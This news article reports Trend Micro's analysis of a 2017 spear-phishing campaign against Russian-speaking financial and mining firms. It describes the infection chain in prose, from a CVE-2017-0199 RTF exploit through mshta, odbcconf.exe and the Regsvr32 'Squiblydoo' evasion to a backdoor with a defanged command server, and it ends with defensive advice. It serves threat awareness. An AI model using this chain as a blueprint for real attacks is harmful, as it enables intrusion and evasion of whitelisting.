Trend Micro alerts users that an email campaign which appeared a couple of months ago is currently targeting Russian-speaking enterprises and delivering a new Windows-based backdoor.
The campaign uses a number of different exploits and Windows components for running malicious scripts trying to make detection and blocking more challenging.
The first sample related to the spam campaign registered five spam runs from June 23 to July 27, 2017. According to security researchers, this campaign is still active now, targeting financial institutions and mining firms.
Experts from Trend Micro point out that hackers have diversified their tactics by sending different, targeted emails for each run. According to the researchers, due to the emails’ limited distribution and specificity in social engineering lures, they should be considered part of a spear-phishing campaign.
The spam emails resemble invoices from sales and billing departments, containing a malformed Rich Text Format (RTF) file which exploits a vulnerability (CVE-2017-0199) in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface patched in April, this year.
Being executed, the exploit code downloads a fake XLS file embedded with malicious JavaScript. Once opened, the Excel header is ignored and the file is treated as an HTML Application file by the mshta.exe Windows component.
The JavaScript code calls the odbcconf.exe normal executable, which performs various tasks associated with Microsoft Data Access Components, to run the DLL. Being installed, the DLL drops a file in the %APPDATA% folder and appends the .TXT extension to it.
Then, the DLL calls the Regsvr32 (Microsoft Register Server) command-line utility in order to execute with specific parameters. This attack method is named Squiblydoo and it abuses Regsvr32 to bypass restrictions on running scripts and evade application white listing protections such as AppLocker.
“While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe,” Trend Micro says.
Then, another XML file is executed, after being downloaded from the domain wecloud[.]biz. which is the main backdoor used in the attack using the same Regsvr32-abusing the Squiblydoo technique.
The backdoor is a SCT file with obfuscated JavaScript code inside and supports commands that “essentially allow attackers to take over an infected system.” The backdoor attempts to connect to the command and control (C&C) server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks.
Following the received commands, the malware is capable of downloading and executing Portable Executable (PE) files, running shell commands, downloading additional/new scripts, deleting files/startup entries, or running new script and terminating the current one.
According to experts from Trend Micro, “While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.”
